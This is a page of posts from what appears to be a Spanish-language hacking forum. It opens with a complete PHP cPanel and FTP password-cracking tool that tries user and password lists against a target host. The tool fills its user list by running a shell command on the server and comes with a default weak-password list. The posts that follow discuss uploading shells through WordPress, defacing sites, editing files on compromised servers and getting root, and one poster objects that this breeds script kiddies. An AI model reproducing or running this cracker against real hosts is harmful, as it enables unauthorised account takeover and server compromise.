Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="code-security.com"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Password is Broken !!</b>");
}
}
$connect_timeout=100;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){
$target = "localhost";
}
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>CF Cracker - www.code-security.com</title>
<body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000">
<div align="center">
<form method="POST" style="border: 1px solid #000000">
<table width="67%" style="border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0">
<tr><td align=center>
<font face="Courier New" size=4 color=yellow>Cpanel + FTP Cracker | Code Security</font>
</td></tr>
</table>
<br />
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
<font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Request Time Out
Please Check The Target Hostname .</font></font></b></p>";exit;}
elseif ( curl_errno($ch) == 0 ){
print "<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'><tr><td align=center><b><font face=\"Tahoma\" color=\"#FF0000\">[+]</font><font>
Username (</font><font color=\"#FF0000\">$user</font><font>) and Password (</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">)</font></b></td></tr></table>";}curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
<font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Request Time Out
Please Check The Target Hostname .</font></font></b></p>";exit;}
elseif ( curl_errno($ch) == 0 ){
print "<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'><tr><td align=center><b><font face=\"Tahoma\" color=\"#FF0000\">[+]</font><font>
Username (</font><font color=\"#FF0000\">$user</font><font>) and Password (</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">)</font></b></td></tr></table>";}curl_close($ch);}
if(isset($submit) && !empty($submit)){
if(empty($users) && empty($pass)){ print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
if(empty($pass) ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
$userlist=explode("\n",$users);
$passlist=explode("\n",$pass);
print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\">
Cracking Process Started, Please Wait ...</font></b><br><br>";
foreach ($userlist as $user) {
$pureuser = trim($user);
foreach ($passlist as $password ) {
$purepass = trim($password);
if($cracktype == "ftp"){
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpanel")
{
cpanel_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}
}
?>
<?php
if($_POST['enter']){
echo "<form method=POST action=''><table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr>
<td> <br />
<p align='center'><b><font color='#FF0000'>
<span lang='en-us'>Server's IP</span> :</font><font face='Arial'>
</font><font face='Arial' color='#CC0000'>
<input type='text' name='target' size='16' value=$target style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'></font></b></p>
<p align='center'><b><font color='#008000' face='Tahoma' size='2'> </font></b></p>
<div align='center'>
<table width='55%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr>
<td align='center'>
<span lang='en-us'><font color='#FF0000'><b>Username</b></font></span></td>
<td>
<p align='center'>
<span lang='en-us'><font color='#FF0000'><b>Password</b></font></span></td>
</tr>
</table>
<p align='center'> <textarea rows='20' name='users' cols='25' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>";
system('ls /var/mail');
echo "</textarea><textarea rows='20' name='passwords' cols='25' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n1478963\n1478963.\ncpanel\npassword\nuser\npasswd\npasswords\n159357\n357951\n114477\npass\nPassword</textarea><br>
<br>
<b> <font font color='#FF0000'>
Select to Crack </font></b><font style='font-size: 12pt;' size='-3' face='Verdana'><span style='font-size: 9pt;'>
<font face='Tahoma'>
<input name='cracktype' value='cpanel' style='font-weight: 700;' checked type='radio'></font></span></font><b><font size='2' face='Tahoma'>
Cpanel</font><font size='2' color='#cc0000' face='Tahoma'>
</font><font size='2' color='#FFFFFF' face='Tahoma'>
(2082)</font></b><font size='2' face='Tahoma'><b> </b>
</font>
<font style='font-size: 12pt;' size='-3' face='Verdana'>
<span style='font-size: 9pt;'><font face='Tahoma'>
<input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></font></span></font><font style='font-weight: 700;' size='2' face='Tahoma'>
</font><span style='font-weight: 700;'>
<font size='2' face='Tahoma'>Ftp </font>
<font size='2' color='#FFFFFF' face='Tahoma'>
(21)</font></span></p>
<p align='center'><option value='name'>
<input type='submit' value=' Crack it ! ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></p>
</td>
</tr>
</table>
<p align='center'></td>
</tr>
</form>
<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr><td align=center>
<font face='Courier New' size=2 color=yellow>[ Created by Code Security ]<br />[+] Copyright reserved to www.code-security.com [+]</font>
</td></tr>
</table>
";die();
}
echo "
<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr><td align=center><form method=POST action='' align=center><br /><input type=submit name=enter value=' ENTER ' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000' /></form></td></tr></table><br />
<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:'#C0C0C0'>
<tr><td align=center>
<font face='Courier New' size=2 color=yellow>[ Created by Code Security ]<br />[+] Copyright reserved to www.code-security.com [+]</font>
</td></tr>
</table>";You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aver cuando pones algo de verdad y no tonterías, porque esto es una bobada.
1- El supuesto "bypass" es solo en el usuario, y va con cualquier OR , pero como tu cogiste un Login de google, pusiste ese user y pass, así que no hay bypass.
2- Eso es un LFI? Eso es una juankerada, no tiene nombre.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
el script esta mal echo
solo sirve par also que tienen los sitios en home
y solo si el script esta peusto en el root de la web
no si okupan subdominos
o esta en otro path el base addres del webserver
no esta mal la ide pero tambien
hay mas formas de conseguir root en n server o cosneguir accesos no solo con mysql
por que de ke te sirve un acceso de contraseña de admin en un cms
si no tienes permisos de escritura
:3
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
a mi no me enseñaron :3
solo es leer
es que velo dicen los botones editar archivo
si fuera algo como el bypass para editar archivos fuera del theme
eso si seria algo ke no descubres mas ke con nivel
pero esto es solo lee documentacion
no es ningun secreto ni privado ni el hilo negro
esto funciona igual con smf
es que estas "tecnicas" provocan la proliferacion de los kiddies
no contribuyen
recuerda dale un pescado a un hombre y comera un dia
enseñale a pescar y comera siempre
enseñales etica enseñales a buscar y leer
no a copiar y pegar :3
y para pentesting se ke se hace
yo me dedico al pentesting desde hace mas de 6 años en entidades bancarias televisoras y gobierno
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero si no sabes leer la edicion de archivos del wordpress
no estas mas bien provocando oleadas de lammers defacers?
por que lo que estas poniendo no son tecnicas de ataque como tal
estas poniendo metodos de modificacion de contenido
y subir la shell es como que muy ovio como subir ese tipo de chells
detodos modos desde un sqli puedes subir una chell
o miles de cosas mas, creo que esto solo proboca oleadas de lammers defaceros
que el deface no es mas que grafitteo inutil :3
Psymera, Aquí estamos para compartir conocimiento... y recuerda que donde dices que "subir una shell es como que muy obvio", Para ti sera obvio porque supuestamente "YA SABIAS" y No todos lo saben; todos en algun momento aprendimos de algo o de alguien.! asi que no te las des de superior ni demerites el post de dedalo porque a muchas personas les sirvió mucho!!!
Salu2
5TU4RT
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Logines un php 5.2.17,el server tiene muchos archivos busco y te digo
que versión del php es la del servidor? existe el archivo named.conf?
Saludos,
Dedalo
tien muchos archibos htaccess pero la mayoria no puedo Borrar ni editarlos
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pues claro que no por que hay permisos de usuario
para que el defaceo masivo? xD
para eso mejor ponganse a conseguir root del server
y pues si esta jailed el server no le haces nada mas ke en donde estes
o si corres como apache nobody o demaz
no vaz a editar lo que no es de tu suid
asi ke no podras editar loq ue no tenga permisos de escritura :3
